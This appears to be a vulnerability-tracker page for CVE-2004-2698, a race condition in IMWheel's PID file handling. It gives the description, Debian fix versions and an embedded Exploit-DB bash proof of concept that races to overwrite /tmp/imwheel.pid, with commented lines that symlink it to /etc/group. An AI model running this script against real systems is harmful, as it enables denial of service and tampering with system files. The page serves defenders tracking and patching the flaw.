CVE-2004-2698

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Race condition in IMWheel 1.0.0pre11 and earlier, when running with the -k option, allows local users to cause a denial of service (IMWheel crash) and possibly modify arbitrary files via a symlink attack on the imwheel.pid file.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-24398 local linux verified text · 1 KB

I)ruid · 2004-08-23

IMWheel 1.0 - Predictable Temporary File Creation

text exploit Source: Exploit-DB

source: https://www.securityfocus.com/bid/11008/info

IMWheel is reported prone to a predictable temporary file creation vulnerability. This issue is a race condition error and may allow a local attacker to carry out denial of service attacks against other users and possibly gain elevated privileges.

This vulnerability was identified in IMWheel 1.0.0pre11, however, other versions may be affected as well. 

#!/bin/bash

# you may have to adjust the number of characters in the print to
# get the timing correct for the injection. Fewer characters seems
# to prevent this from working. Optionally, replacing the echo
# with the symlink creation at the end of this script seems to work
# fairly regularly.
CHARCOUNT=4000

echo `perl -e 'print "9" x $CHARCOUNT;'` > /tmp/imwheel.pid
while [[ $? != 0 ]]; do
echo `perl -e 'print "9" x $CHARCOUNT;'` > /tmp/imwheel.pid
done

# Wait for imwheel to write it's pid to the new file
sleep 1
# Wipe the contents of the PID file.
echo > /tmp/imwheel.pid

# Optionally, replace the new file with a link
# rm /tmp/imwheel.pid
# ln -s /etc/group /tmp/imwheel.pid

echo "Exploit Successful!!!"

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`1.0.0pre12-1`
sid	Fixed	`1.0.0pre12-1`
forky	Fixed	`1.0.0pre12-1`
bullseye	Fixed	`1.0.0pre12-1`
bookworm	Fixed	`1.0.0pre12-1`

References

https://security-tracker.debian.org/tracker/CVE-2004-2698

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.